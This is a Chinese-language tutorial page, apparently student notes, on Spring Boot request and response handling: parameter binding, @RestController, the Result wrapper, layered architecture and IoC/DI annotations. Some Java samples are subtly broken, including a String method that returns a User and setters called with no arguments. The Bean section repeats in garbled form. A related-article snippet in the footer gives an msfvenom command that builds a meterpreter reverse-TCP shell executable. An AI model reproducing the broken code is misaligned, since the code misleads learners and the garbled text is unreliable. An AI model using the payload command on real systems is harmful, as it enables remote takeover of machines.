java:SpringBootWeb请求响应

Servlet

用java编写的服务器端程序

客户端发送请求至服务器

服务器启动并调用Servlet,Servlet根据客户端请求生成响应内容并将其传给服务器

服务器将响应返回给客户端

javaweb的工作原理

在这里插入图片描述

在SpringBoot进行web程序开发时,内置了一个核心的Servlet程序DispatcherServlet,称之为核心控制器.

DispatcherServlet负责接收页面发送的请求,根据资源链接执行的规则,将请求再分发给部署在tomcat中的请求处理器Controller,请求处理器处理完请求之后,最终再由DispatcherServlet给浏览器响应数据.

浏览器发送请求到后端服务器tomcat后,tomcat会负责解析这些请求数据,将解析后数据传递到Servlet程序的HttpServletRequest对象,意味着HttpServletRequest对象可以获取到请求数据.同时传递了一个HttpServletResponse对象,来给浏览器设置响应数据.

请求:浏览器->HTTP->tomcat(内置servlet解析)->request对象->数据

响应:数据->response对象->servlet解析->HTTP->浏览器

请求

接收页面传递来的请求数据

后端接收前端传递的数据

底层依赖于getset方法进行取值(反射)

Postman

一款功能强大的网页调试和发送网页HTTP请求的Chrome插件

用于接口测试

接口测试:模拟前端发送请求,检验数据传输的正确性

界面功能如下所示

在这里插入图片描述

后端资源链接不能重复

简单参数

通过Servlet中提供的API HttpServletRequest可以获取请求的相关信息
@RequestMapping("/simpleParam")
public String simpleParam(HttpServletRequest request){String name = request.getParameter("name");String age = request.getParameter("age");System.out.println(name+" : "+age);return "OK";
}
//request对象中包含请求数据,可以直接通过getParameter()方法进行获取
使用SpringBoot方式

在SpringBoot环境中,对原始的API进行了封装,接收参数形式更加简单.

可以直接定义同名参数接收数据.

@RequestMapping("/simpleParam")public String simpleParam(String name , Integer age ){System.out.println(name+" : "+age);return "OK";
}
使用postman进行测试

在这里插入图片描述

快速提交带参数的请求

参数名不一致

可以使用@RequestParam进行映射

用法如下

@RequestMapping("/simpleParam")
public String simpleParam(@RequestParam("username") String name ,Integer age){System.out.println(name+" : "+age);return "OK";
}
//在形参前加上注解完成映射

实体参数

如果参数数量比较多,可以通过封装到一个pojo对象的方式进行数据封装

参数名需与POJO属性名一致

简单实体对象

定义一个pojo实体类

public class User {private String name;private Integer age;public String getName() {return name;}public void setName(String name) {this.name = name;}public Integer getAge() {return age;}public void setAge(Integer age) {this.age = age;}@Overridepublic String toString() {return "User{" +"name='" + name + '\'' +", age=" + age +'}';}
}

在controller方法中传入pojo对象接受数据

@RequestMapping("/simplePojo")
public String simplePojo(User user){System.out.println(user);return "OK";
}
//pojo对象接受与其属性名相同的参数
复杂实体对象

在实体类中的一个或多个属性为其他实体类的对象

封装需要遵循如下规则:

请求参数名与形参对象的属性名相同,即接收属性中的实体类对象属性时,参数需要为对象.属格式.

在这里插入图片描述

数组集合参数

数组参数

请求参数名和形参对象属性名相同且请求参数为多个.

即接收多个同名参数

传递形式:

在这里插入图片描述

集合

集合参数

请求参数名和形参集合对象名字相同且请求参数为多个

使用@RequestParam绑定参数关系
@RequestMapping("/listParam")
public String listParam(@RequestParam List<String> hobby){System.out.println(hobby);return "OK";
}

传递形式

在这里插入图片描述

日期参数

对日期类型的参数进行封装的时候,需要通过@DateTimeFormat注解,以及其中的pattern属性来设置日期格式

pattern属性中制定了前端传递参数时的规格.

@RequestMapping("/dateParam")
public String dateParam(@DateTimeFormat(pattern = "yyyy-MM-dd HH:mm:ss") LocalDateTime updateTime){System.out.println(updateTime);return "OK";
}

传递形式

在这里插入图片描述

JSON参数

比较复杂的参数可以通过JSON格式进行传输,JSON数据键名和形参对象属性名相同,定义POJO类型形参即可接收参数,controller方法需要使用@RequestBody注解

使用实体类对象接受
@RequestMapping("/jsonParam")
public String jsonParam(@RequestBody User user){System.out.println(user);return "OK";
}

传递形式

在这里插入图片描述

路径参数

通过请求URL传递参数,使用{}进行标识,需要使用@PathVariable注解获取路径参数

参数尽量使用包装类
@RequestMapping("/path/{id}")
public String pathParam(@PathVariable Integer id){System.out.println(id);return "OK";
}@RequestMapping("/path/{id}/{name}")
public String pathParam2(@PathVariable Integer id, @PathVariable
String name){System.out.println(id+ " : " +name);return "OK";
}

传递形式

在这里插入图片描述

响应

@RestController注解

包含@Controller注解和@ResponseBody注解

Controller注解声明类为控制器

ResponseBody将返回值解析为JSON或者XML格式

可以在controller类中响应一个实体对象或者集合

eg:

响应一个实体类对象

@RequestMapping("/simpleParam")
public String simpleParam( String name , Integer age){User user = new User();user.setName();user.setAge();return user;
}

响应一个集合

@RequestMapping("/list")
public ArrayList<String> simpleParam( String name , Integer age){ArrayList<String> list = new ArrayList<>();return list;
}
无论响应数据形式是什么,都应该以Result形式返回(统一规范)
Result
{Integer code//1:成功 0:失败String msg//响应码 描述字符串Object data//使用Object类型可以接收任意数据static Result success(data){//返回成功时的result}static Result error(msg){//返回失败时的result}
}

综合案例(解析xml文件传递到前端页面)

前端

页面绑定js数据,数据绑定钩子函数请求的数据

钩子函数:

mounted() {axios.get("/User").then(result=>(this.tableData=result.data.data))
},

在组件加载阶段使用axios异步请求数据

后端

读取解析xml文件

String file = 
类名.class//获取字节码文件
.getClassLoader()//获取类加载器
.getResource()//获得资源
.File()//文件路径
XmlParserUtils.parse(file)对xml进行解析,得到一个对象集合

调用result里的success方法

返回成功对象

 return Result.success(list);

分层解耦

三层架构

数据访问->逻辑访问->请求处理

数据访问:

负责业务数据的维护操作,包括增,删,改,查等操作

逻辑处理:

负责业务逻辑处理的代码

请求处理,响应数据:

负责,接收页面的请求,给页面响应数据

按照三个组成部分,将代码分为三层
Controller(控制层)

接收前端发送的请求,对请求进行处理,并响应数据

Service(业务层)

处理具体的业务逻辑,对数据进行处理

Dao/Mapper(数据访问层/持久层)

负责数据的访问操作,包含数据的增删改查操作

分层解耦

内聚:软件中各个功能模块内部的功能联系

耦合:软件中各个层(模块)之间的依赖关联程度

IOC/DI技术(inversion of control/dependency injection)

IOC容器中管理的对象称为bean

@Component(加在实现类上)

@Primary有多个实现类对象时优先用被primary注解标注的

把实现类对象直接放入IOC容器中(控制反转)

@Autowired(加在声明对象语句上)

把IOC容器中的对象拿出来(依赖注入)

解决创建对象时产生的耦合

UserService a = new UserService();
//左侧通过实现接口实现多态进行解耦
//右侧通过IOC/DI思想解决
Bean的声明

把对象交给IOC容器管理,需要以如下注解代替@Component

Dao层->@Repository(自定义名字(默认类名小写))

Service层->@Service(自定义名字(默认类名小写))

Controller层->@Controller(自定义名字(默认类名小写))

其他类对象->@Componet(自定义名字(默认类名小写))

以上四大注解生效需要被组件扫描注解@ComponentScan扫描

默认扫描范围为引导类所在包以及其子包

Bean注入

@Primary优先使用本类对象

@Qualifier(“str”)选择名字为str的bean对象进行使用

由SpringBoot框架提供

@Resource(name=“str”)选择名字为str的bean对象使用

由java提供

rvice();
//左侧通过实现接口实现多态进行解耦
//右侧通过IOC/DI思想解决

#### Bean的声明把对象交给IOC容器管理,需要以如下注解代替@ComponentDao层->@Repository(自定义名字(默认类名小写))Service层->@Service(自定义名字(默认类名小写))Controller层->@Controller(自定义名字(默认类名小写))其他类对象->@Componet(自定义名字(默认类名小写))以上四大注解生效需要被组件扫描注解@ComponentScan扫描默认扫描范围为引导类所在包以及其子包#### Bean注入@Primary优先使用本类对象@Qualifier("str")选择名字为str的bean对象进行使用由SpringBoot框架提供@Resource(name="str")选择名字为str的bean对象使用由java提供

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/829570.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

msf渗透实验,抓取密钥及密钥生成原理所引发的问题

1、生成反向shell msfvenom --list payloads 查看某个功能模块的具体功能msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.208.128 LPORT12345 -f exe -o shell.exe 生成一个.exe的控制文件&#xff0c;反向连接的payload2、接收shell,与反向shell建立连接 …

【小迪安全2023】第59天:服务攻防-中间件安全CVE复现lSApacheTomcatNginx

&#x1f36c; 博主介绍&#x1f468;‍&#x1f393; 博主介绍&#xff1a;大家好&#xff0c;我是 hacker-routing &#xff0c;很高兴认识大家~ ✨主攻领域&#xff1a;【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 &#x1f389;点赞➕评论➕收…

最短路(Dijkstra, Bellman-Ford, SPFA, Floyd)

最短路 Dijkstra算法&#xff08;复杂度 O ( m l o g n ) O(mlog n) O(mlogn)/ O ( n m l o g n ) O(nmlogn) O(nmlogn)&#xff09;–不能有负权边&#xff0c;不能有负权环&#xff0c;单源最短路径( O ( m l o g n ) O(mlog n) O(mlogn))&#xff0c;多源最短路径( O ( n m…

python在Django中使用django-mptt库来实现无限级树结构非常直观和方便

在Django中使用django-mptt库来实现无限级树结构非常直观和方便。django-mptt(Modified Preorder Tree Traversal)是一个用于Django模型的树形结构字段的库,它允许你通过递归的方式轻松地构建和操作树形结构。 下面是一个使用django-mptt和MySQL数据库实现无限级树结构的基…

hive创建hbase外部关联表实例

在cdh6.3.2已经做好hbase和hive相关配置&#xff0c;这里不阐述。 要创建上述的表结构&#xff0c;你需要先在HBase中创建相应的表&#xff0c;然后在Hive中创建一个EXTERNAL TABLE来映射到这个HBase表。以下是详细的步骤&#xff1a; 步骤1&#xff1a;在HBase中创建表 确定…

【javpower:后端技术革新的开源之旅】

&#x1f31f; javpower&#xff1a;探索Java后端的无限可能 在Java技术的宇宙中&#xff0c;我以代码为舟&#xff0c;以创新为帆&#xff0c;不断探索后端开发的深邃与广阔。我是javpower&#xff0c;一名对技术充满热情的实践者&#xff0c;我的旅程是通过开源项目与世界分…

k8s: 从私有仓库harbor获取镜像

一、根据私有仓库的用户名密码等信息创建secret kubectl create secret docker-registry my-registry-secret \ --docker-serverxxx.xxx.xxx.xxx \ --docker-usernameadmin \ --docker-passwordHarbor12345 \ --docker-emailxxxxsina.com二、在清单文件中使用imagePullSecrets…

SQL dialect is not configured. Apache Cassandra matches best.没有配置SQL方言 如何处理

我这里是MySQL语言,所以我设置MySQL dialect 写个记录,之后更换全局SQL语言再换 下图是设置

boot https ssl 使用http协议访问报错

在springboot中配置ssl以后&#xff0c; 再次使用http访问对应的接口就会报错 可以考虑如下设置&#xff0c;将http访问的端口重定向到https对应的端口 import org.apache.catalina.Context; import org.apache.catalina.connector.Connector; import org.apache.tomcat.util…

Qt——实现滚动条添加小组件自动跳转到最后

为了使滚动区域在您添加新的控件后自动滑动到底部&#xff0c;显示新增的窗口&#xff0c;您可以利用 Qt 的 QScrollArea 的滚动条进行调整。在您的 DWidget::toggleNewAdd 函数中&#xff0c;添加窗口到布局后&#xff0c;可以通过调整滚动区的滚动条到最大值来实现这一点。 …

神经网络中多层卷积的作用

在神经网络中采用多层卷积的目的是为了逐步提取和组合图像的抽象特征&#xff0c;从而更有效地学习数据的表示并执行复杂的任务。不同层的卷积具有不同的作用&#xff0c;从较低层次的特征&#xff08;例如边缘、纹理&#xff09;到较高层次的抽象特征&#xff08;例如物体部件…

ZISUOJ 数据结构--串及其应用

说明&#xff1a; 都是字符串的基本操作没啥好说的&#xff0c;直接上题目和代码了。 题目列表&#xff1a; 问题 A: 字符串翻转 参考题解&#xff1a; #include <iostream> #include <string> #include <algorithm> using std::cin; using std::cout; usi…

【TensorFlow深度学习】张量比较与条件操作的应用场景

张量比较与条件操作的应用场景 1. 张量比较操作1.1 常用张量比较函数1.1.1 相等比较1.1.2 不等于比较1.1.3 大于比较 1.2 张量比较的应用场景1.2.1 数据过滤1.2.2 激活函数1.2.3 损失函数1.2.4 条件训练 2. 条件操作2.1 常用条件操作函数2.1.1 tf.cond2.1.2 tf.where 2.2 条件操…

OpenHarmony语言基础类库【@ohos.util.PlainArray (非线性容器PlainArray)】

PlainArray可用于存储具有关联关系的key-value键值对集合&#xff0c;存储元素中key值唯一&#xff0c;key值类型为number类型&#xff0c;每个key对应一个value。 PlainArray依据泛型定义&#xff0c;采用轻量级结构&#xff0c;集合中key值的查找依赖于二分查找算法&#xf…

数字电路-可预置倒计时器Multisim仿真

数字电路之于FPGA意义重大。本可预置倒计时器设计采用40106作为振荡电路&#xff0c;由74LSl92、74LS47D和七段共阴数码管构成计时电路&#xff0c;具有启动/预置、暂停/继续计时和报警功能。紫色文字是超链接&#xff0c;点击自动跳转至相关博文。持续更新&#xff0c;原创不易…

OceanBase 分布式数据库【信创/国产化】- OceanBase 与 MySql 兼容性对比

本心、输入输出、结果 文章目录 OceanBase 分布式数据库【信创/国产化】- OceanBase 与 MySql 兼容性对比前言OceanBase 数据更新架构OceanBase 与 MySql 兼容性对比OceanBase 数据类型SQL 语法过程性语言OceanBase 支持的字符集OceanBase 存储引擎OceanBase 分区支持OceanBase…

用C实现通讯录(详细讲解+源码)

前言 &#x1f4da;作者简介&#xff1a;爱编程的小马&#xff0c;正在学习C/C&#xff0c;Linux及MySQL.. &#x1f4da;以后会将数据结构收录为一个系列&#xff0c;敬请期待 ● 本期内容会给大家带来通讯录的讲解&#xff0c;主要是利用结构体来实现通讯录&#xff0c;该通讯…

[ESP32]:TFLite Micro推理CIFAR10模型

[ESP32]&#xff1a;TFLite Micro推理CIFAR10模型 模型训练 数据集处理 from keras.datasets import cifar10 from keras.preprocessing.image import ImageDataGenerator from keras.models import Sequential, load_model, Model from keras.layers import Input, Dense, …

目标检测(任务概述、机器学习时代的方法、深度学习时代的目标检测模型)

文章目录 目标检测任务概述机器学习时代的目标检测方法深度学习时代的目标检测模型基于提议的目标检测模型R-CNN 模型Fast RCNN 模型Faster RCNN 模型SSD 模型YOLO 模型 基于分割的目标检测模型FCN 模型U-Net 模型 目标检测任务概述 目标检测任务的概念&#xff1a;尝试从一张…

xLua详解

目录 环境准备xLua导入 C#调用LuaLua解析器Lua文件加载重定向Lua解析管理器全局变量的获取全局函数的获取List和Dictionary映射table类映射table接口映射tableLuaTable映射table Lua调用C#准备工作Lua使用C#类Lua调用C#枚举Lua使用C# 数组 List 字典数组List字典 Lua使用C#扩展…